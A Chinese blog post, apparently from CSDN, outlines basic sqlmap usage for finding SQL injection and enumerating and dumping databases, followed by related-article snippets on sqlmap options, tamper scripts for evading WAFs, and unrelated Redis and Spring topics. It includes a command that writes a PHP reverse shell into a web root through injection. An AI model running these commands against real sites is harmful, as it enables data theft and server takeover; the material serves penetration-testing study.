Sqlmap ---- 数据库的枚举 最最最最基本的使用

最新推荐文章于 2025-11-30 19:25:58 发布
原创 最新推荐文章于 2025-11-30 19:25:58 发布 · 570 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#数据库 #web安全 #安全 #网络安全 #sql

SQLMap是一款强大的SQL注入检测和利用工具,能自动识别漏洞并支持多种数据库。文章介绍了如何使用它进行数据库枚举、表枚举、数据提取和命令执行。实例展示了如何利用Sqlmap写入反弹shell。

Sqlmap ---- 数据库的枚举

sqlmap -u http://test.com?id=1

sqlmap -r note.txt

其中note.txt为 burpsuite中抓取到的 可能存在sql注入的数据包。 可以直接放在一个文件中 让sqlmap去读取,并且识别是否存在sql注入漏洞

同时还可以和正常的利用一样增加参数 例如:

sqlmap -r note.txt -T users --dump

SQLMap 是一款开源的自动化 SQL 注入和数据库接管工具。它非常强大,能够检测和利用多种 SQL 注入漏洞。使用 SQLMap 可以帮助您识别网站中的 SQL 注入漏洞,并在渗透测试中进行利用。

SQLMap 主要特点

  1. 自动检测和利用 SQL 注入漏洞:能够自动识别 SQL 注入类型,包括盲注、时间盲注等。
  2. 支持多种数据库系统:包括 MySQL、Oracle、PostgreSQL、MSSQL、SQLite 等。
  3. 数据提取:能够提取数据库中的数据,如用户账户、密码、数据库结构等。
  4. 命令执行:某些 SQL 注入漏洞允许执行操作系统命令,SQLMap 也支持这种功能。
  5. 支持多种注入技术:包括 UNION 查询、布尔盲注、基于时间的盲注等。

使用示例

  • 基础命令sqlmap -u "http://example.com/page.php?id=1"
  • 数据库枚举sqlmap -u "http://example.com/page.php?id=1" --dbs
  • 表枚举sqlmap -u "http://example.com/page.php?id=1" -D database_name --tables
  • 数据提取sqlmap -u "http://example.com/page.php?id=1" -D database_name -T table_name --columns

遇到的实例

sqlmap -r 2.txt --batch --file-write /tmp/shell.php --file-dest /var/www/shell1.php #用sql注入来写入反弹shell

阿瓜之树
关注
sqlmap-master
01-04
2. **枚举**:一旦找到注入点,SQLMap枚举数据库的用户、权限、表名、列名等信息,为后续的攻击提供基础。 3. **数据提取**:通过构造特定的SQL查询,SQLMap可以读取或下载数据库中的任意数据,包括敏感信息如...
sqlmapproject-sqlmap-1.4.8-11-ga42ec7d.zip
08-20
SQLMap的核心目标是检测Web应用是否存在SQL注入漏洞,一旦发现,它可以用来枚举数据库信息,提取数据,甚至完全控制系统。SQLMap支持多种数据库管理系统,包括MySQL、PostgreSQL、Oracle、Microsoft SQL Server等。 ...
Sqlmap枚举信息
一米八多的瑞兹的博客
03-07 325
Sqlmap枚举信息 1. Sqlmap列举数据库名 –dbs 列举数据库名称 2. Sqlmap枚举数据库表 –tables 枚举表名 --> 指定具体数据库 -D 数据库名 –exclude-sysdbs 3. Sqlmap枚举数据表列 –columns -D指定数据库 -T指定数据表 -C指定具体字段 4. Sqlmap枚举数据值 –dump ...
网络渗透4
nico15的博客
12-25 435
7、枚举指定数据表中的所有用户名与密码,并down到本地。--tables:枚举指定数据库的所有表。2、枚举当前使用数据库名称和用户名。6、获取指定数据库和表中所有列的信息。5、枚举数据库和指定数据库的数据表。--columns:获取列的信息-D 数据库名:指定数据库--dbs:枚举当前数据库-T:指定数据库中的数据表。--dump:存储数据表项。Sqlmap输出截图。Sqlmap输出截图。Sqlmap输出截图。Sqlmap输出截图。Sqlmap输出截图。-C:枚举数据表中的列。
SQLMAP注入教程-11种常见SQLMAP使用方法详解
dfdhxb995397的博客
08-24 5029
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。今天把我一直以来整理的sqlmap笔记发布上来供大家参考。 一共有11种常见SQLmap使用方法:一、SQLMAP用于Access数据库注入(1) 猜解是否能注入 ...
sqlmap学习(十三)枚举信息
rane的博客
03-29 1969
1、sqlmap列举数据库名 参数:--dbs 2、sqlmap列举数据库表 参数:--tables获取全部表名 -D数据库名 获取指定数据库中的表 python sqlmap.py -u "http://172.17.0.1/Less-1/?id=1" --tables -D 数据库--exclude-sysdbs可排除系统数据库 3、sqlmap列举数据表列 参数:--columns,-...
sqlmap注入总结
weixin_34321753的博客
08-22 1619
本实验是基于DVWA和sqli-labs的实验环境实验平台搭建:下载Wamp集成环境,并下载DVWA和sqli-labs和压缩包解压至wamp\www的目录下。安装只要注意Wamp环境的数据库名和密码对应即可。sqlmap里涉及到的sql注入原理,请参考http://wt7315.blog.51cto.com/10319657/1828167,实验环境也是基于sqli-lab...
2024最新的最全面基本sqlmap使用命令
为了低调的博客
08-27 1671
bash复制代码通过本地代理(例如Burp Suite)进行扫描。bash复制代码每次请求使用随机的User-Agent头进行扫描。bash复制代码指定id和user两个参数进行测试。bash复制代码。
sqlmap-wx-0.3.1.7z
01-29
3. 数据库枚举:一旦发现注入点,工具会尝试枚举数据库信息,如数据库名、表名、列名以及数据本身。 4. 数据提取:能够从数据库中提取敏感信息,如用户名、密码、数据库结构等。 5. 控制权获取:在某些情况下,...
sqlmapproject-sqlmap-1.5.3-24-gbce3abc.zip
03-28
SQLMap的主要功能是扫描网站应用程序是否存在SQL注入漏洞,通过自动化探测和利用这些漏洞,它能够枚举数据库信息、读取数据库表、获取数据记录,甚至能执行操作系统命令和获取服务器的完全权限。它的核心特性包括但...
sqlmap-wiki-zhcn::syringe:可能是最完整的sqlmap中文文档
02-04
2. **枚举**:一旦检测到漏洞,它会枚举数据库管理系统(如MySQL、PostgreSQL、Oracle等)、数据库名、表名以及列名等信息。 3. **数据提取**:能够从数据库中导出数据,包括表中的记录、特定字段的数据等。 4. **...
sqlmap 入门级使用
热门推荐
梦落红尘
06-21 3万+
虽然我用过mssql和oracle,但表示只是用过,不是很熟,所以本文大多数都在说MySQL数据库。 一、数据库 数据库管理系统  ->  数据库(可能存在多个) ->   表(一般一个数据库中都存储多个表) -> 字段  (一般一个表中都有多个字段) 也就是说:一般都是一对多的关系,这里就不深究了,我们先来看看表(tables)的结构。    这是从phpmyadmin中截取的
Sqlmap枚举DBMS用户信息
一米八多的瑞兹的博客
03-07 203
Sqlmap枚举DBMS用户信息 1. Sqlmap探测当前用户DBA –is-dba 探测当前用户是否是数据库管理员。 2. Sqlmap枚举DBMS用户 获取DBMS所有用户 –users 3. Sqlmap枚举DBMS用户密码 –password 获取用户密码 4. Sqlmap枚举DBMS权限 –privileges --role(角色) ...
面试必问——Redis 主从同步
2301_79966297的博客
11-26 595
偏移量,随着记录在repl_baklog中的数据增多而逐渐增大。salve完成同步时也会记录当前同步的offset。如果salve的offset小于master的offset,说明salve的数据落后于master,需要更新。:简称replid,是数据集的标记,id一致则说明是同一个数据集。每个master都有唯一的replid,salve则会继承master节点的replid。:单点的Redis的并发能力是有限的,要进一步提高Redis的并发能力,就需要搭建主从集群,实现读写分离。
基于Python与Go构建云原生微服务自动化运维平台的架构设计思路实践策略与性能优化方法全流程解析
2501_94114213的博客
11-26 818
Python 提供灵活的任务调度与编排能力,Go 提供高并发、高吞吐的任务执行与采集能力。两者结合构建的云原生微服务运维平台能够在大规模环境下实现:自动化高可靠弹性扩展可观测高性能随着企业上云进程加速,Python + Go 的混合运维平台将成为云原生运维的标准实践方案。
redis基本类型 5种基本类型
最新发布
yeshihouhou的博客
11-30 154
List的另一个应用就是消息队列,可以利用List的 PUSH 操作,将任务存放在List中,然后工作线程再用 POP 操作将任务取出进行执行。我们在谈基础数据结构时,讨论的是存储值的数据类型,主要包括常见的5种数据类型,分别是:String、List、Set、Zset、Hash。Redis hash 是一个 string 类型的 field(字段) 和 value(值) 的映射表,hash 特别适合用于存储对象。Redis 中集合是通过哈希表实现的,所以添加,删除,查找的复杂度都是 O(1)。
influx2.0+grafana
lan266548_ning的博客
11-27 411
Mac 安装 Docker(Docker Desktop)教程官方下载地址:根据你的 Mac 类型,下载对应版本:Intel。
后端在分布式存储中的元数据管理
2509_93946509的博客
11-28 457
但实际生产环境中远不止这些:数据的冷热状态、压缩标志、校验和、生命周期标签,甚至用户自定义的扩展属性,都是元数据的一部分。我们团队就吃过亏,早期设计时只考虑了基础字段,后来业务方想要实现智能分层存储,不得不对元数据表做了两次大的结构调整,那个迁移过程简直噩梦。我们现在用的是Raft共识算法,虽然写性能有些损失,但保证了数据的强一致性,运维起来也省心。按文件路径哈希是最简单的,但有个问题:同一个目录下的文件可能被散列到不同节点,做目录遍历时要跨节点查询,效率很低。全量缓存不现实,我们吃过内存溢出的亏。
Spring Boot「多数据源并存」的设计思路,它与动态数据源又有什么区别?
weixin_46739493的博客
11-27 1332
我不切换数据源,我只是同时拥有多个 DataSource,每一个都明确对应自己的 Mapper / SqlSessionFactory / 事务管理器。其核心特点是:同时存在多个 DataSource Bean每个 DataSource 有自己的配置每个 DataSource 对应自己的 Mapper / Dao / Service不使用 AbstractRoutingDataSource不需要 ThreadLocal 切换不互相影响各自为政使用起来一模一样怎么切换?
sqlmap-master使用方法
03-19
### SQLMap Master 的使用方法 SQLMap 是一款强大的自动化 SQL 注入工具,能够帮助安全研究人员发现并利用 SQL 注入漏洞。虽然官方文档中并未特别区分 `sqlmap` 和所谓的 `sqlmap-master`,但从上下文中可以推测,“master”可能是指最新版本或者特定分支下的增强版。 以下是关于 SQLMap 使用的一些核心知识点以及如何高效操作: #### 基础概念 SQLMap 支持多种注入技术,包括布尔盲注、时间盲注、联合查询等,并兼容主流关系型数据库(如 MySQL, PostgreSQL, Oracle 等)。其主要功能可以通过命令行参数实现[^1]。 #### 主要参数说明 以下是一些常用的 SQLMap 参数及其作用: - `-u/--url`: 指定目标 URL。 - `--data`: 提交 POST 数据。 - `--level`: 设置测试级别,默认为 1,最高为 5。 - `--risk`: 风险等级设置,默认为 1,最高为 3。 - `--dbs`: 枚举所有可用的数据库名称。 - `--tables`: 列出指定数据库中的表名。 - `--columns`: 显示选定表中的列名。 - `--dump`: 导出整个数据库的内容。 - `--batch`: 自动运行而不提示用户输入。 - `--random-agent`: 使用随机 User-Agent 进行请求。 - `--tamper`: 调用 tamper 脚本来规避 WAF 或其他防护机制[^2]。 #### 查看当前使用数据库实例 如果需要确认目标站点正在使用的具体数据库类型,可执行如下命令: ```bash sqlmap -u 'http://example.com/page?id=1' --current-db ``` 上述指令将返回目标服务器上活动的默认数据库名称[^3]。 #### 关于 `search` 和 `dump` 的差异 需要注意的是,`search` 功能主要用于查找符合条件的数据对象(比如某些字段或记录),但如果未提供额外选项(例如 `-D`, `-T`, `-C`),则该功能不会生效;相比之下,`dump` 更倾向于全面提取已知范围内的数据集[^4]。 #### Tamper 脚本的应用场景 Tamper 脚本允许修改原始 payload 形式以便绕过复杂的防御措施。例如,在面对启用了 Magic Quotes GPC 的 PHP 应用程序时,可以选择加载对应的 tamper 文件来调整字符串编码方式: ```bash sqlmap -u "http://vulnerable.site/vuln.php?id=1" --tamper=between.py,timebased_blind.py ``` #### 实际案例分析 假设我们要通过 Sqlmap 获取 DVWA 平台上的敏感信息,则按照以下流程逐步推进即可完成任务: 1. **初步探测**: 执行简单的 GET 请求验证是否存在潜在漏洞; 2. **深入挖掘**: 结合高级配置项进一步探索受影响区域的具体细节; 3. **最终导出**: 将有价值的结果保存至本地文件供后续研究。 --- ### Python 示例代码片段展示调用过程 下面是采用编程接口形式启动 Sqlmap 测试的一个简单例子: ```python import subprocess def run_sqlmap(url): command = [ "sqlmap", "-u", url, "--batch", "--threads=10" ] result = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(result.stdout.decode()) if __name__ == "__main__": target_url = "http://testphp.vulnweb.com/artists.php?artist=1" run_sqlmap(target_url) ``` 此脚本定义了一个函数用来封装基本交互逻辑,便于集成到更大规模的安全评估框架之中。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值